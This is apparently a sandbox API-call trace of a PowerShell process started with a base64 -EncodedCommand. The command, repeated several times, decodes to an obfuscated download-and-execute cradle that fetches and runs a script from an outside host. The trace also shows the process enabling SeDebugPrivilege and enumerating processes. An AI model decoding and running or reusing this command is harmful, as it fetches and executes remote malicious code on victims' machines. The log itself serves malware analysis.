	[0741.212] FindNextFileW (in: hFindFile=0x1b310350, lpFindFileData=0x1c81dad0 | out: lpFindFileData=0x1c81dad0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0741.212] FindClose (in: hFindFile=0x1b310350 | out: hFindFile=0x1b310350) returned 1
	[0741.212] SetErrorMode (uMode=0x1) returned 0x1
	[0741.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c81dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0741.213] SetErrorMode (uMode=0x1) returned 0x1
	[0741.214] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c81ddf0 | out: lpFileInformation=0x1c81ddf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0741.214] SetErrorMode (uMode=0x1) returned 0x1
	[0741.215] CoTaskMemAlloc (cb=0x104) returned 0x2ede50
	[0741.215] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ede50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0741.215] CoTaskMemFree (pv=0x2ede50) 
	[0741.216] CoTaskMemAlloc (cb=0x104) returned 0x2ede50
	[0741.216] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ede50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0741.217] CoTaskMemFree (pv=0x2ede50) 
	[0741.220] CoTaskMemAlloc (cb=0x104) returned 0x2ede50
	[0741.220] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ede50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0741.220] CoTaskMemFree (pv=0x2ede50) 
	[0741.230] CoTaskMemAlloc (cb=0x104) returned 0x2ede50
	[0741.230] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ede50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0741.230] CoTaskMemFree (pv=0x2ede50) 
	[0742.562] CoTaskMemAlloc (cb=0x3b) returned 0x1b34b2e0
	[0742.563] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c81dfd8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c81dfd8) returned 0x4550
	[0742.564] CoTaskMemFree (pv=0x1b34b2e0) 
	[0742.567] GetConsoleWindow () returned 0x20356
	[0742.575] CoTaskMemAlloc (cb=0x104) returned 0x2ede50
	[0742.575] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ede50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0742.575] CoTaskMemFree (pv=0x2ede50) 
	[0742.576] CoTaskMemAlloc (cb=0x104) returned 0x2ede50
	[0742.576] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2ede50, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0742.576] CoTaskMemFree (pv=0x2ede50) 
	[0742.582] CoTaskMemAlloc (cb=0x104) returned 0x2ede50
	[0742.582] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2ede50, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0742.582] CoTaskMemFree (pv=0x2ede50) 
	[0742.584] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c81e020 | out: pNumArgs=0x1c81e020) returned 0x2b3640*=""
	[0742.585] lstrlenW (lpString="-EncodedCommand") returned 15
	[0742.586] CoTaskMemAlloc (cb=0x22) returned 0x1b345b00
	[0742.586] RtlMoveMemory (in: Destination=0x1b345b00, Source=0x2b3662, Length=0x20 | out: Destination=0x1b345b00) 
	[0742.586] CoTaskMemFree (pv=0x1b345b00) 
	[0742.586] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0742.586] CoTaskMemAlloc (cb=0x2f4) returned 0x1b354b40
	[0742.587] RtlMoveMemory (in: Destination=0x1b354b40, Source=0x2b3682, Length=0x2f2 | out: Destination=0x1b354b40) 
	[0742.587] CoTaskMemFree (pv=0x1b354b40) 
	[0742.587] LocalFree (hMem=0x2b3640) returned 0x0
	[0742.588] CoTaskMemAlloc (cb=0x804) returned 0x1b355d70
	[0742.588] GetConsoleTitleW (in: lpConsoleTitle=0x1b355d70, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0743.781] CoTaskMemFree (pv=0x1b355d70) 
	[0743.791] CoTaskMemAlloc (cb=0x38e) returned 0x2b3640
	[0743.791] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c81df80*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x32d9a50 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x32d9a50*(hProcess=0x39c, hThread=0x398, dwProcessId=0x144c, dwThreadId=0x15ec)) returned 1
	[0745.311] CoTaskMemFree (pv=0x2b3640) 
	[0745.312] CloseHandle (hObject=0x398) returned 1
	[0745.312] CoTaskMemAlloc (cb=0x3b) returned 0x1b34b2e0
	[0745.312] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c81e028, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c81e028) returned 0x4550
	[0745.323] CoTaskMemFree (pv=0x1b34b2e0) 
	[0745.327] GetCurrentProcess () returned 0xffffffffffffffff
	[0745.327] GetCurrentProcess () returned 0xffffffffffffffff
	[0745.328] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x39c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c81e108, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c81e108*=0x398) returned 1

Process:
	id = "105"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x74ec0000"
	os_pid = "0x13dc"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 550
	os_tid = 0x13e0

	[0824.658] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0835.338] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0835.338] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0835.339] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0835.339] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0942.942] GetVersionExW (in: lpVersionInformation=0xadec0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xadec0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0942.944] GetVersionExW (in: lpVersionInformation=0xadec0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xadec0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0942.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0942.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0942.955] GetVersionExW (in: lpVersionInformation=0xadc30*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xadc30*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0942.956] SetErrorMode (uMode=0x1) returned 0x1
	[0942.956] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xadd90 | out: lpFileInformation=0xadd90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0942.957] SetErrorMode (uMode=0x1) returned 0x1
	[0942.960] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xae000 | out: lpdwHandle=0xae000) returned 0x94c
	[0943.625] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2df72f0 | out: lpData=0x2df72f0) returned 1
	[0943.627] VerQueryValueW (in: pBlock=0x2df72f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xadf78, puLen=0xadf70 | out: lplpBuffer=0xadf78*=0x2df738c, puLen=0xadf70) returned 1
	[0943.629] lstrlenW (lpString="䅁") returned 1
	[0943.638] VerQueryValueW (in: pBlock=0x2df72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xadee8, puLen=0xadee0 | out: lplpBuffer=0xadee8*=0x2df7468, puLen=0xadee0) returned 1
	[0943.639] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0943.641] CoTaskMemAlloc (cb=0x2e) returned 0x21a890
	[0943.641] lstrcpyW (in: lpString1=0x21a890, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0943.642] CoTaskMemFree (pv=0x21a890) 
	[0943.643] VerQueryValueW (in: pBlock=0x2df72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xadee8, puLen=0xadee0 | out: lplpBuffer=0xadee8*=0x2df74bc, puLen=0xadee0) returned 1
	[0943.643] lstrlenW (lpString="System.Management.Automation") returned 28
	[0943.643] CoTaskMemAlloc (cb=0x3c) returned 0x1c4a50
	[0943.643] lstrcpyW (in: lpString1=0x1c4a50, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0943.643] CoTaskMemFree (pv=0x1c4a50) 
	[0943.643] VerQueryValueW (in: pBlock=0x2df72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xadee8, puLen=0xadee0 | out: lplpBuffer=0xadee8*=0x2df7518, puLen=0xadee0) returned 1
	[0943.643] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0943.643] CoTaskMemAlloc (cb=0x20) returned 0x220060
	[0943.643] lstrcpyW (in: lpString1=0x220060, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0943.643] CoTaskMemFree (pv=0x220060) 
	[0943.643] VerQueryValueW (in: pBlock=0x2df72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xadee8, puLen=0xadee0 | out: lplpBuffer=0xadee8*=0x2df7558, puLen=0xadee0) returned 1
	[0943.643] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0943.643] CoTaskMemAlloc (cb=0x44) returned 0x1c4a50
	[0943.643] lstrcpyW (in: lpString1=0x1c4a50, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0943.643] CoTaskMemFree (pv=0x1c4a50) 
	[0943.643] VerQueryValueW (in: pBlock=0x2df72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xadee8, puLen=0xadee0 | out: lplpBuffer=0xadee8*=0x2df75c0, puLen=0xadee0) returned 1
	[0943.643] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0943.643] CoTaskMemAlloc (cb=0x76) returned 0x1b0f90
	[0943.643] lstrcpyW (in: lpString1=0x1b0f90, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0943.644] CoTaskMemFree (pv=0x1b0f90) 
	[0943.644] VerQueryValueW (in: pBlock=0x2df72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xadee8, puLen=0xadee0 | out: lplpBuffer=0xadee8*=0x2df765c, puLen=0xadee0) returned 1
	[0943.644] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0943.644] CoTaskMemAlloc (cb=0x44) returned 0x1c4a50
	[0943.644] lstrcpyW (in: lpString1=0x1c4a50, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0943.644] CoTaskMemFree (pv=0x1c4a50) 
	[0943.644] VerQueryValueW (in: pBlock=0x2df72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xadee8, puLen=0xadee0 | out: lplpBuffer=0xadee8*=0x2df76c0, puLen=0xadee0) returned 1
	[0943.644] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0943.644] CoTaskMemAlloc (cb=0x58) returned 0x17bfe0
	[0943.644] lstrcpyW (in: lpString1=0x17bfe0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0943.644] CoTaskMemFree (pv=0x17bfe0) 
	[0943.644] VerQueryValueW (in: pBlock=0x2df72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xadee8, puLen=0xadee0 | out: lplpBuffer=0xadee8*=0x2df773c, puLen=0xadee0) returned 1
	[0943.644] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0943.644] CoTaskMemAlloc (cb=0x20) returned 0x220060
	[0943.644] lstrcpyW (in: lpString1=0x220060, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0943.644] CoTaskMemFree (pv=0x220060) 
	[0943.645] VerQueryValueW (in: pBlock=0x2df72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xadee8, puLen=0xadee0 | out: lplpBuffer=0xadee8*=0x2df73e4, puLen=0xadee0) returned 1
	[0943.645] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0943.645] CoTaskMemAlloc (cb=0x66) returned 0x17ce00
	[0943.645] lstrcpyW (in: lpString1=0x17ce00, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0943.645] CoTaskMemFree (pv=0x17ce00) 
	[0943.645] VerQueryValueW (in: pBlock=0x2df72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xadee8, puLen=0xadee0 | out: lplpBuffer=0xadee8*=0x0, puLen=0xadee0) returned 0
	[0943.645] VerQueryValueW (in: pBlock=0x2df72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xadee8, puLen=0xadee0 | out: lplpBuffer=0xadee8*=0x0, puLen=0xadee0) returned 0
	[0943.645] VerQueryValueW (in: pBlock=0x2df72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xadee8, puLen=0xadee0 | out: lplpBuffer=0xadee8*=0x0, puLen=0xadee0) returned 0
	[0943.645] VerQueryValueW (in: pBlock=0x2df72f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xadeb8, puLen=0xadeb0 | out: lplpBuffer=0xadeb8*=0x2df738c, puLen=0xadeb0) returned 1
	[0943.646] CoTaskMemAlloc (cb=0x204) returned 0x1b42c0
	[0943.646] VerLanguageNameW (in: wLang=0x0, szLang=0x1b42c0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0944.245] CoTaskMemFree (pv=0x1b42c0) 
	[0944.245] VerQueryValueW (in: pBlock=0x2df72f0, lpSubBlock="\\", lplpBuffer=0xadf08, puLen=0xadf00 | out: lplpBuffer=0xadf08*=0x2df7318, puLen=0xadf00) returned 1
	[0944.251] GetCurrentProcessId () returned 0x13dc
	[0944.267] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xace30 | out: lpLuid=0xace30*(LowPart=0x14, HighPart=0)) returned 1
	[0944.270] GetCurrentProcess () returned 0xffffffffffffffff
	[0944.271] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0xace50 | out: TokenHandle=0xace50*=0x2d4) returned 1
	[0944.272] AdjustTokenPrivileges (in: TokenHandle=0x2d4, DisableAllPrivileges=0, NewState=0x2dfab68*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0944.273] CloseHandle (hObject=0x2d4) returned 1
	[0944.277] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x13dc) returned 0x2d4
	[0944.908] EnumProcessModules (in: hProcess=0x2d4, lphModule=0x2dfabd0, cb=0x200, lpcbNeeded=0xade68 | out: lphModule=0x2dfabd0, lpcbNeeded=0xade68) returned 1
	[0944.912] GetModuleInformation (in: hProcess=0x2d4, hModule=0x13f370000, lpmodinfo=0x2dfae40, cb=0x18 | out: lpmodinfo=0x2dfae40*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0944.913] CoTaskMemAlloc (cb=0x804) returned 0x221100
	[0944.913] GetModuleBaseNameW (in: hProcess=0x2d4, hModule=0x13f370000, lpBaseName=0x221100, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0944.913] CoTaskMemFree (pv=0x221100) 
	[0944.914] CoTaskMemAlloc (cb=0x804) returned 0x221100
	[0944.914] GetModuleFileNameExW (in: hProcess=0x2d4, hModule=0x13f370000, lpFilename=0x221100, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0944.914] CoTaskMemFree (pv=0x221100) 
	[0944.915] CloseHandle (hObject=0x2d4) returned 1
	[0944.923] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x13dc) returned 0x2d4
	[0944.924] GetExitCodeProcess (in: hProcess=0x2d4, lpExitCode=0xadf98 | out: lpExitCode=0xadf98*=0x103) returned 1
	[0944.928] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12dfb088, Length=0x20000, ResultLength=0xadf60 | out: SystemInformation=0x12dfb088, ResultLength=0xadf60*=0x4a0a0) returned 0xc0000004
	[0944.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12e1b0b8, Length=0x4c8a0, ResultLength=0xadf60 | out: SystemInformation=0x12e1b0b8, ResultLength=0xadf60*=0x4a0a0) returned 0x0
	[0945.655] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x4d0
	[0945.655] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x558
	[0945.655] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x4d0
	[0945.655] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x4d0
	[0945.656] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x4d0
	[0945.656] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x538
	[0945.656] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x4d0
	[0945.656] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x778
	[0945.656] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x778
	[0945.656] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x4d0
	[0945.656] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x4d0
	[0945.656] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x4d0
	[0945.656] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x4d0
	[0945.656] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x4d0
	[0945.656] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x4d0
